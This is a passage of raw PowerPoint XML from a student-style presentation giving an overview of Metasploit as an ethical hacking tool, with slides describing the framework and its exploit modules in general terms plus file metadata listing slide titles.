          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1784412"/>
            <a:ext cx="5268266" cy="4006789"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Metasploit Framework:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>The Metasploit Framework forms the core of Metasploit and provides the foundation for its functionalities. It is an open-source platform written in Ruby that includes a wide range of modules and tools for security testing. The Framework allows users to exploit vulnerabilities, develop custom exploits, and perform post-exploitation activities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE470046-C052-CFFC-8293-0BAB4742BF1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6826161" y="1234749"/>
            <a:ext cx="5020376" cy="5106113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1402577623"/>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E1011D-3DAA-3F45-70FE-BF4AFE6D9D64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="719091"/>
            <a:ext cx="9905999" cy="5228948"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Exploit Modules:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Exploit modules in Metasploit are pre-written codes that target specific vulnerabilities in systems, applications, or network protocols. These modules automate the process of exploiting vulnerabilities by providing the necessary payloads and techniques to gain unauthorized access to a target system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113321151"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:comb/>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436</TotalTime>
  <Words>2158</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>156</Paragraphs>
  <Slides>29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 Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Segoe UI Black</vt:lpstr>
      <vt:lpstr>Söhne</vt:lpstr>
      <vt:lpstr>Söhne Mono</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Circuit</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Metasploit: An Overview of an Ethical Hacking Tool</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>What is Metasploit ?</vt:lpstr>
      <vt:lpstr>Role of Metasploit in Ethical Hacking </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Components of Metasploit </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Metasploit Workflow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Cases and Examples </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>best cyber security practices </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dattasandip2003@outlook.com</dc:creator>
  <cp:lastModifiedBy>dattasandip2003@outlook.com</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-19T05:13:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-13T06:22:44Z</dcterms:modified>
</cp:coreProperties>
</file>